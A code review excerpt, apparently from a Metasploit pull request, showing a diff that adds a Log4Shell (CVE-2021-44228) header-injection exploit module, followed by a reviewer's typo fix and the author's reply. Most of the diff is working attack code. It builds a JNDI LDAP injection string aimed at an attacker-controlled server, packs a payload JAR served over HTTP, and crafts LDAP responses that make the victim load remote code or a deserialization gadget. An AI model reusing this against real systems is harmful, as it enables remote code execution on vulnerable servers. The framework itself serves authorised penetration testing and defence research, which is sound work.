modules/exploits/multi/http/log4shell_header_injection.rb

```diff
@@ -0,0 +1,314 @@
+      OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
+      OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
+      OptString.new('HTTP_HEADER', [ true, 'The header to inject', 'X-Api-Version']),
+      OptString.new('YSOSERIAL_LIB', [ true, 'Ysoserial library for deserialization', 'CommonsCollections4']),
+      OptPort.new('HTTPPORT', [true, 'The HTTP server port', 8080]),
+      OptBool.new('LDAP_AUTH_BYPASS', [true, 'Ignore LDAP client authentication', true]),
+      OptBool.new('REMOTE_LOAD', [true, 'Load payload from MSF HTTP service instead of Ysoserial method', true]),
+    ])
+  end
+
+  def jndi_string
+    "${jndi:ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}}"
+  end
+
+  def resource_url_string
+    "http#{datastore['SSL'] ? 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTPPORT']}#{resource_uri}"
+  end
+
+  #
+  # Use Ruby Java bridge to create a Java-natively-serialized object
+  #
+  # @return [String] Marshalled serialized byteArray of the loader class
+  def byte_array_payload(pay_class = 'metasploit.PayloadFactory')
+    jar = generate_payload.encoded_jar
+    serialized_class_from_jar(jar, pay_class)
+  end
+
+  #
+  # Insert PayloadFactory in Java payload JAR
+  #
+  # @param jar [Rex::Zip::Jar] payload JAR to update
+  # @return [Rex::Zip::Jar] updated payload JAR
+  def inject_jar_payload_factory(jar = generate_payload.encoded_jar)
+    # From exploits/multi/browser/java_rhino - should probably go to lib
+    paths = [
+      [ 'metasploit/PayloadFactory.class' ]
+    ]
+    paths.each do |path|
+      1.upto(path.length - 1) do |idx|
+        full = path[0, idx].join('/') + '/'
+        jar.add_file(full, '') unless jar.entries.map(&:name).include?(full)
+      end
+      File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', path), 'rb') do |fd|
+        data = fd.read(fd.stat.size)
+        jar.add_file(path.join('/'), data)
+      end
+    end
+    jar
+  end
+
+  #
+  # Generate and serialize the payload as an LDAP search respnse
+  #
+  # @param msg_id [Integer] LDAP message identifier
+  # @param base_dn [Sting] LDAP distinguished name
+  #
+  # @return [Array] packed BER sequence
+  def serialized_payload(msg_id, base_dn, pay_class = 'metasploit.PayloadFactory')
+    if datastore['REMOTE_LOAD']
+      attrs = [
+        [ 'javaClassName'.to_ber, [ pay_class.to_ber].to_ber_set ].to_ber_sequence,
+        [ 'javaFactory'.to_ber, [ pay_class.to_ber].to_ber_set ].to_ber_sequence,
+        [ 'objectClass'.to_ber, [ 'javaNamingReference'.to_ber ].to_ber_set ].to_ber_sequence,
+        [ 'javaCodebase'.to_ber, [ resource_url_string.to_ber ].to_ber_set ].to_ber_sequence,
+      ]
+    else
+      java_payload = generate_java_deserialization_for_payload(datastore['YSOSERIAL_LIB'], payload)
+      # vprint_good("Serialized java paload: #{java_payload}")
```

Comment:
```suggestion
      # vprint_good("Serialized java payload: #{java_payload}")
```

Reply:
I type like a fish apparently, will take fixes on all of these, thank you.